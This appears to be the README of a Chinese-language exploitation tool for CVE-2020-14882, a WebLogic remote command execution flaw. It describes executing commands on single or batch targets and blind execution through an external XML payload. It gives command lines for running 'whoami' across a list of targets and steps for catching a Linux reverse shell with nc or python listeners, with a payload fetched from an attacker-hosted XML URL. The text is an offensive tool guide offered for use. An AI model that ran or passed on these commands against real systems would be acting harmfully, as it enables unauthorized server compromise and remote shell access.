CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。 需要模块:requests、http.client 功能一:命令回显 br
功能二:批量命令回显 python3 CVE-2020-14882_ALL.py -f target.txt -c 'whoami' target.txt 格式:http://x.x.x.x:xx,一行一个 功能三:外置xml文件无回显命令执行 1、Linux反弹shell为例,编辑好poc.xml文件,开启python监听。
开启python监听 nc开启监听 2、使用-x选项指定xml文件路径,发送payload。 python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml 3、成功接收shell |
|